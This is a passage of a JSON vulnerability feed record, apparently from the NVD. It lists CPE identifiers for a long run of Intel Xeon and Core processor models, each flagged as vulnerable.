              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6142m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6142f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6142:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6134m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6134:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6126f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6126:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8176m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8176f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8160m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8160f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7250f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7250:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:8550u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:8650u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:8100:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:8350k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7700k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7700t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6685r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6600k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6400:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6400t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6300u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6200u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6260u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100h:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6006u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6098p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5950hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5850hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5850eq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5600u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:5557u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5350h:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:5300u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:5010u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:5005u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m:5y10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4900mq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4850hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4860hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4702mq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4710hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4760hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770te:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4610m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4610y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4690t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4422e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4410e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4440s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4440:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4308u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4310m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4310u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4200u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4200y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4250u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4258u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4340te:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4350:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4100m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4100u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4170t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4170:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4005u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4010u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4790k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4771:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4785t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4790:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4650u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:4500u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4670s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570r:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4570t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4402ec:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4402e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4430s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4430:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4330m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4340m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4202y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4210h:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4260u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:4278u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4350t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4360:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4102e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4110e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4160t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4160:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4010y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:4012y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4627_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4620_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2697a_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2695_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2658_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2650_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2628l_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2623_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1660_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1650_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2428l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4667_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1620_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2697_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1650_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2690_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4627_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2667_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2660_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2658a_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2637_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2608l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2603_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4607_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4610_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2620_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2428l_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2430l_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2630l_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2643_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2450l_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2667_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2670_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4603:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2403:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:4617:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2420:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_1660:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2430l:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2637:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5_2450:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2658:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e5:2660:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8870:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8867l:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4850:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4830:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4820:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2803:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8894_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8860_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4850_v4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8880_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8870_v3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8850_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:8857_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4890_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:4880_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2880_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e7:2870_v2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4114:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4112:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6148f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6148:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6138t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6138f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6130f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:6130:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:5120:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_gold:5119t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8170:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8168:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8156:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8153:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7210f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7210:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_phi:7235:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:8350u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:8250u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7820hk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7820eq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7560u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7500u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6500:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6500t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6442eq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:6360u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6300:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6300t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6167u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:6100:*:*:*:*:*:*:*",
                "cpe_name": [],
